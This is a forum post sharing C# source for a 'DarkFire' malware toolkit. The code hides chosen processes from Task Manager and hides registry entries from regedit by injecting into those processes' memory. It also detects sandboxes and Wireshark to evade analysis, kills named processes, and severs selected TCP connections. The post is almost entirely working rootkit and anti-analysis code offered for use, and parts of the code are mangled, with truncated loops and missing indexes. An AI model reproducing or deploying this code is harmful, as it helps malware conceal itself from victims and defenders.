dEEpEst Posted August 27, 2014 Share Posted August 27, 2014 [HIDE-THANKS]using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Management; using System.Net; using System.Runtime.InteropServices; using System.Threading; using System.Windows.Forms; using Microsoft.Win32; namespace DarkFire { static public class Rootkits { static private bool Initialized1, Initialized2, Initialized3; static private DateTime TaskManagerTime = DateTime.Now; static private int TaskManagerCount; static private bool TaskManagerReload; static private List RegistryKeys = new List(); static public void HideProcess(Process process) { if (!Initialized1) Initialize(1); new Proc(process); TaskManagerReload = true; } static public void HideRegistryValue(RegistryKey key, string value) { if (!Initialized2) Initialize(2); new RegVal(key, value); } static public void HideRegistryKey(RegistryKey key) { if (!Initialized3) Initialize(3); RegistryKeys.Add(key.Name.ToLower().Split(\'\\\')); } static private void Initialize(int proc) { switch (proc) { case 1: new Thread(new ThreadStart(delegate { while (true) { _HideProcess(); Thread.Sleep(10); } })).Start(); Initialized1 = true; break; case 2: new Thread(new ThreadStart(delegate { while (true) { Thread.Sleep(_HideRegistryValue() ? 10 : 250); } })).Start(); Initialized2 = true; break; case 3: new Thread(new ThreadStart(delegate { while (true) { Thread.Sleep(_HideRegistryKey() ? 10 : 250); } })).Start(); Initialized3 = true; break; } } static private void _HideProcess() { try { IntPtr lhWndParent = Process.GetProcessesByName("taskmgr")[0].MainWindowHandle; Api.WindowPlacement winp = new Api.WindowPlacement(); winp.length = Marshal.SizeOf(winp); Api.GetWindowPlacement(lhWndParent, ref winp); bool visible = winp.showCmd == 1 || winp.showCmd == 3; IntPtr lhParent = Api.FindWindowEx(lhWndParent, IntPtr.Zero, null, null); IntPtr lhWndProcessList = Api.GetDlgItem(lhParent, 1009); IntPtr hMenu = Api.GetMenu(lhWndParent); IntPtr hViewMenu = Api.GetSubMenu(hMenu, 2); IntPtr hUpdateSpeed = Api.GetSubMenu(hViewMenu, 1); uint hRefreshNow = Api.GetMenuItemID(hViewMenu, 0); if (hUpdateSpeed != IntPtr.Zero) { Api.SendMessage(lhWndParent, 273, (IntPtr)Api.GetMenuItemID(hUpdateSpeed, 3), IntPtr.Zero); Api.RemoveMenu(hViewMenu, (uint)hUpdateSpeed, 1); } Api.EnableMenuItem(hMenu, hRefreshNow, 1); if (visible) Api.LockWindowUpdate(lhWndProcessList); if ((DateTime.Now - TaskManagerTime).TotalMilliseconds > 1000) { Api.SendMessage(lhWndParent, 273, (IntPtr)hRefreshNow, IntPtr.Zero); TaskManagerTime = DateTime.Now; } GC.Collect(); int count = (int)Api.SendMessage(lhWndProcessList, 0x1004, IntPtr.Zero, ""); if (count != TaskManagerCount || TaskManagerReload) { TaskManagerReload = false; TaskManagerCount = count; for (int i = 0; i { string[] cells = new string[10]; for (int a = 0; a { cells[a] = GetListViewItem(lhWndProcessList, i, a).ToLower(); if (a > 0 && cells[a] == cells[0]) break; } foreach (Proc proc in Proc.List) { bool f1 = false, f2 = false; for (int a = 0; a { if (cells[a] == null || f1 && f2) break; else if (cells[a].StartsWith(proc.Name)) f1 = true; else if (cells[a] == proc.User) f2 = true; } if (f1 && f2) { Api.SendMessage(lhWndProcessList, 4104, (IntPtr)i--, IntPtr.Zero); TaskManagerCount--; break; } } } } if (visible) Api.LockWindowUpdate(IntPtr.Zero); } catch { } } static private bool _HideRegistryValue() { bool open = false; try { IntPtr lhWndParent = Process.GetProcessesByName("regedit")[0].MainWindowHandle; open = true; IntPtr lhParent = Api.FindWindowEx(lhWndParent, IntPtr.Zero, null, null); IntPtr lhWndValuesList = Api.GetDlgItem(lhWndParent, 2); IntPtr lhWndPathLabel = Api.GetDlgItem(lhWndParent, 3); string path = GetStatusBarText(lhWndPathLabel, 0); path = path.Substring(path.IndexOf("\\") + 1).ToLower(); int count = 0; RegistryKey key = null; foreach (RegVal regval in RegVal.List) { if (regval.Key == path) { key = regval.RegKey; count++; } } if (count > 0) { int cnt = (int)Api.SendMessage(lhWndValuesList, 0x1004, IntPtr.Zero, IntPtr.Zero); if (cnt != key.ValueCount + 1 - count) { Api.LockWindowUpdate(lhWndValuesList); for (int i = 1; i { foreach (RegVal regval in RegVal.List) { if (regval.Key == path && regval.Value == GetListViewItem(lhWndValuesList, i, 0).ToLower()) { Api.SendMessage(lhWndValuesList, 4104, (IntPtr)i--, IntPtr.Zero); } } } Api.LockWindowUpdate(IntPtr.Zero); } } } catch { } return open; } static private bool _HideRegistryKey() { bool open = false; try { IntPtr lhWndParent = Process.GetProcessesByName("regedit")[0].MainWindowHandle; open = true; IntPtr lhParent = Api.FindWindowEx(lhWndParent, IntPtr.Zero, null, null); IntPtr lhWndKeysList = Api.GetDlgItem(lhWndParent, 1); int dwProcessID; int item = Api.SendMessage(lhWndKeysList, 0x110a, 4u, (IntPtr)Api.SendMessage(lhWndKeysList, 0x110a, 0u, IntPtr.Zero)); IntPtr lpLocalBuffer = Marshal.AllocHGlobal(1024); IntPtr threadId = Api.GetWindowThreadProcessId(lhWndKeysList, out dwProcessID); IntPtr hProcess = Api.OpenProcess(2035711, false, dwProcessID); IntPtr lpRemoteBuffer = Api.VirtualAllocEx(hProcess, IntPtr.Zero, 1024, 0x1000, 4); ExtractRegKey(hProcess, lhWndKeysList, item, lpLocalBuffer, lpRemoteBuffer, new List()); Marshal.FreeHGlobal(lpLocalBuffer); Api.VirtualFreeEx(hProcess, lpRemoteBuffer, 0, 0x8000); Api.CloseHandle(hProcess); GC.Collect(); } catch { } return open; } static private void ExtractRegKey(IntPtr hProcess, IntPtr hTreeview, int index, IntPtr lpLocalBuffer, IntPtr lpRemoteBuffer, List stack) { while (index > 0) { Api.TvItem item = new Api.TvItem(); item.mask = 1; item.hItem = (IntPtr)index; item.pszText = (IntPtr)((int)lpRemoteBuffer + Marshal.SizeOf(typeof(Api.TvItem))); item.cchTextMax = 255; Api.WriteProcessMemory(hProcess, lpRemoteBuffer, ref item, Marshal.SizeOf(typeof(Api.TvItem)), IntPtr.Zero); Api.SendMessage(hTreeview, 0x110c, 0, lpRemoteBuffer); Api.ReadProcessMemory(hProcess, lpRemoteBuffer, lpLocalBuffer, 1024, IntPtr.Zero); string val = Marshal.PtrToStringAnsi((IntPtr)((int)lpLocalBuffer + Marshal.SizeOf(typeof(Api.TvItem)))).ToLower(); if (index > 0) { int iChildItem = Api.SendMessage(hTreeview, 0x110a, 4u, (IntPtr)index); stack.Add(val); bool del = false; foreach (string[] keys in RegistryKeys) { if (stack.Count == keys.Length) { bool del2 = true; for (int i = 0; i { if (stack != keys) { del2 = false; break; } } if (del2) { del = true; break; } } } stack.RemoveAt(stack.Count - 1); if (del) { Api.SendMessage(hTreeview, 0x1101, 4u, (IntPtr)index); } else if (iChildItem > 0) { stack.Add(val); ExtractRegKey(hProcess, hTreeview, iChildItem, lpLocalBuffer, lpRemoteBuffer, new List(stack.ToArray())); stack.RemoveAt(stack.Count - 1); } } index = Api.SendMessage(hTreeview, 0x110a, 1u, (IntPtr)index); } } static private string GetStatusBarText(IntPtr handle, int index) { int length = (int)Api.SendMessage(handle, 0x40c, (IntPtr)index, IntPtr.Zero); length = (length & 0xffff) * 2; uint pid = 0; Api.GetWindowThreadProcessId(handle, out pid); IntPtr hProcess = Api.OpenProcess(0x001f07ff, false, (int)pid); IntPtr allocated = Api.VirtualAllocEx(hProcess, IntPtr.Zero, (uint)length, 0x3000, 4); int read = 0; byte[] buffer = new byte[length]; Api.SendMessage(handle, 0x040d, (IntPtr)index, allocated); Api.ReadProcessMemory(hProcess, allocated, buffer, length, out read); string res = ""; for (int i = 0; i { res += Convert.ToChar(buffer | buffer[i + 1] } Api.CloseHandle(hProcess); return res; } static private string GetListViewItem(IntPtr hWnd, int index, int subitem) { Api.LvItem lvItem = new Api.LvItem(); IntPtr lpLocalBuffer = Marshal.AllocHGlobal(1024); uint pid; uint thread = Api.GetWindowThreadProcessId(hWnd, out pid); IntPtr hProcess = Api.OpenProcess(0x001f0fff, false, (int)pid); IntPtr lpRemoteBuffer = Api.VirtualAllocEx(hProcess, IntPtr.Zero, 1024, 0x1000, 4); lvItem.mask = 1; lvItem.iItem = index; lvItem.iSubItem = subitem; lvItem.pszText = (IntPtr)((int)lpRemoteBuffer + Marshal.SizeOf(typeof(Api.LvItem))); lvItem.cchTextMax = 50; Api.WriteProcessMemory(hProcess, lpRemoteBuffer, ref lvItem, Marshal.SizeOf(typeof(Api.LvItem)), 0); Api.SendMessage(hWnd, 0x1005, IntPtr.Zero, lpRemoteBuffer); Api.ReadProcessMemory(hProcess, lpRemoteBuffer, lpLocalBuffer, 1024, 0); string ret = Marshal.PtrToStringAnsi((IntPtr)((int)lpLocalBuffer + Marshal.SizeOf(typeof(Api.LvItem)))); Marshal.FreeHGlobal((IntPtr)lpLocalBuffer); Api.VirtualFreeEx(hProcess, lpRemoteBuffer, 0, 0x8000); Api.CloseHandle(hProcess); return ret; } static private string GetProcessUser(Process process) { ManagementObjectCollection procs = new ManagementObjectSearcher("Select * From Win32_Process Where ProcessID = " + process.Id).Get(); foreach (ManagementObject obj in procs) { string[] args = new string[] { "" }; int returnVal = Convert.ToInt32(obj.InvokeMethod("GetOwner", args)); if (returnVal == 0) return args[0]; } return ""; } private class Proc { static public List List = new List(); public string Name, User; public Proc(Process proc) { Name = proc.ProcessName.ToLower(); User = GetProcessUser(proc).ToLower(); lock (List) List.Add(this); } } private class RegVal { static public List List = new List(); public RegistryKey RegKey; public string Key; public string Value; public RegVal(RegistryKey key, string value) { RegKey = key; Key = key.Name.ToLower(); Value = value.ToLower(); lock (List) List.Add(this); } } } static public class Antis { static private bool Initialized; static private List DisabledProcesses = new List(); static public bool _IsAny { get { return IsSandboxie || IsNormanSandbox || IsSunbeltSandbox || IsAnubisSandbox || IsCWSandbox || IsWireshark; } } static public bool IsSandboxie { get { try { foreach (ProcessModule module in Process.GetCurrentProcess().Modules) { string name = module.ModuleName.ToLower().Trim(); if (name == "?" || name.Contains("sbiedll")) { return true; } } } catch { } return false; } } static public bool IsNormanSandbox { get { return Environment.UserName.ToLower() == "currentuser"; } } static public bool IsSunbeltSandbox { get { string path = Application.ExecutablePath.ToLower(); return Path.GetDirectoryName(path) + Path.GetFileNameWithoutExtension(path) == "c:\\file"; } } static public bool IsAnubisSandbox { get { return Path.GetFileNameWithoutExtension(Application.ExecutablePath).ToLower() == "sample" || Environment.UserName.ToLower() == "andy"; } } static public bool IsCWSandbox { get { string path = Application.ExecutablePath.ToLower(); return path == "c:\\" || path == "d:\\" || path == "f:\\" || path == "x:\\" && Environment.UserName.ToLower() == "schmidti"; } } static public bool IsWireshark { get { return Process.GetProcessesByName("wireshark").Length > 0; } } static public void DisableProcess(string name) { if (!Initialized) { new Thread(new ThreadStart(delegate { while (true) { _DisableProcess(); Thread.Sleep(10); } })).Start(); Initialized = true; } DisabledProcesses.Add(name.Trim().ToLower()); } static private void _DisableProcess() { try { foreach (Process process in Process.GetProcesses()) { try { if (DisabledProcesses.Contains(process.ProcessName.ToLower())) process.Kill(); } catch { } } GC.Collect(); } catch { } } } static public class Internet { static private int _RefreshRate = 10; static public int RefreshRate { get { return _RefreshRate; } set { _RefreshRate = value; } } static private bool Initialized; static private List DisabledIps = new List(); static private List DisabledPorts = new List(); static public void DisableIp(IPAddress ip) { DisabledIps.Add(BitConverter.ToInt32(ip.GetAddressBytes(), 0)); Initialize(); } static public void DisableHost(string host) { foreach (IPAddress ip in Dns.GetHostAddresses(host)) { DisableIp(ip); } } static public void DisablePort(int port) { DisabledPorts.Add(port); Initialize(); } static private void Initialize() { if (!Initialized) { new Thread(new ThreadStart(delegate { while (true) { Update(); Thread.Sleep(_RefreshRate); } })).Start(); Initialized = true; } } static private void Update() { TcpRow[] rows = TcpTable; for (int i = 0; i { foreach (int address in DisabledIps) { if (rows.dwLocalAddr == address || rows.dwRemoteAddr == address) { rows.dwState = 12; SetTcpEntry(GetPtr(rows)); } } foreach (int port in DisabledPorts) { if (ntohs(rows.dwLocalPort) == port || ntohs(rows.dwRemotePort) == port) { rows.dwState = 12; SetTcpEntry(GetPtr(rows)); } } } GC.Collect(); } static private TcpRow[] TcpTable { get { try { IntPtr buffer = IntPtr.Zero; int iBytes = 0; GetTcpTable(IntPtr.Zero, ref iBytes, false); buffer = Marshal.AllocCoTaskMem(iBytes); GetTcpTable(buffer, ref iBytes, false); int count = Marshal.ReadInt32(buffer); IntPtr subptr = (IntPtr)((int)buffer + 4); TcpRow[] rows = new TcpRow[count]; int size = Marshal.SizeOf(typeof(TcpRow)); for (int i = 0; i { rows = (TcpRow)Marshal.PtrToStructure(subptr, typeof(TcpRow)); subptr = (IntPtr)((int)subptr + size); } Marshal.FreeCoTaskMem(buffer); GC.Collect(); return rows; } catch { return new TcpRow[0]; } } } static private IntPtr GetPtr(object obj) { IntPtr ptr = Marshal.AllocCoTaskMem(Marshal.SizeOf(obj)); Marshal.StructureToPtr(obj, ptr, false); return ptr; } private struct TcpRow { public int dwState; public int dwLocalAddr; public int dwLocalPort; public int dwRemoteAddr; public int dwRemotePort; } [DllImport("iphlpapi.dll")] static private extern int GetTcpTable(IntPtr pTcpTable, ref int pdwSize, bool bOrder); [DllImport("iphlpapi.dll")] static private extern int SetTcpEntry(IntPtr pTcprow); [DllImport("wsock32.dll")] static private extern int ntohs(int netshort); [DllImport("wsock32.dll")] static private extern int htons(int netshort); } static internal class Api { [DllImport("user32.dll", SetLastError = true)] static public extern IntPtr FindWindowEx(IntPtr hwndParent, IntPtr hwndChildAfter, string lpszClass, string lpszWindow); [DllImport("user32.dll")] static public extern IntPtr GetDlgItem(IntPtr hDlg, int nIDDlgItem); [DllImport("user32.dll")] static public extern bool EnableWindow(IntPtr hWnd, bool bEnable); [DllImport("user32.dll")] static public extern IntPtr GetMenu(IntPtr hWnd); [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] static public extern IntPtr GetSubMenu(IntPtr hMenu, int nPos); [DllImport("user32.dll")] static public extern uint GetMenuItemID(IntPtr hMenu, int nPos); [DllImport("user32.dll")] static public extern bool EnableMenuItem(IntPtr hMenu, uint uIDEnableItem, uint uEnable); [DllImport("user32.dll")] static public extern bool RemoveMenu(IntPtr hMenu, uint uPosition, uint uFlags); [DllImport("user32.dll", CharSet = CharSet.Auto)] static public extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam); [DllImport("user32.dll", CharSet = CharSet.Auto)] static public extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, string lParam); [DllImport("user32.dll", CharSet = CharSet.Auto)] static public extern IntPtr SendMessage(IntPtr hWnd, [MarshalAs(UnmanagedType.U4)] int msg, IntPtr wParam, ref TvItem item); [DllImport("user32.dll")] static public extern int SendMessage(IntPtr hWnd, int Msg, uint wParam, IntPtr lParam); [DllImport("user32.dll")] static public extern bool LockWindowUpdate(IntPtr hWndLock); [DllImport("user32.dll")] static public extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] [return: MarshalAs(UnmanagedType.Bool)] static public extern bool GetWindowPlacement(IntPtr hWnd, ref WindowPlacement lpwndpl); [DllImport("kernel32.dll")] static public extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll")] static public extern bool CloseHandle(IntPtr hObject); [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] static public extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] static public extern bool VirtualFreeEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint dwFreeType); [DllImport("kernel32.dll")] static public extern bool ReadProcessMemory(IntPtr hProcess, IntPtr baseAddress, byte[] buffer, int dwSize, out int numberOfBytesRead); [DllImport("kernel32.dll")] static public extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, int dwSize, int lpNumberOfBytesRead); [DllImport("kernel32.dll")] static public extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, ref TvItem buffer, int dwSize, IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll", SetLastError = true)] static public extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); [DllImport("kernel32.dll")] static public extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, ref LvItem buffer, int dwSize, int lpNumberOfBytesWritten); [DllImport("kernel32.dll")] static public extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, int dwSize, IntPtr lpNumberOfBytesRead); [DllImport("user32.dll", SetLastError = true)] static public extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId); [DllImport("user32.dll")] static public extern IntPtr GetWindowThreadProcessId(IntPtr hWnd, out int lpwdProcessID); [structLayout(LayoutKind.Sequential)] public struct LvItem { public uint mask; public int iItem; public int iSubItem; public uint state; public uint stateMask; public IntPtr pszText; public int cchTextMax; public int iImage; } [structLayout(LayoutKind.Sequential)] public struct TvItem { public int mask; public IntPtr hItem; public int state; public int stateMask; public IntPtr pszText; public int cchTextMax; public int iImage; public int iSelectedImage; public int cChildren; public IntPtr lParam; public int iIntegral; } public struct Rect { int left, top, right, bottom; } public struct Point { int x, y; } public struct WindowPlacement { public int length, flags, showCmd; public Point ptMinPosition, ptMaxPosition; public Rect rcNormalPosition; } } }[/HIDE-THANKS] Link to comment Share on other sites More sharing options...
Recommended Posts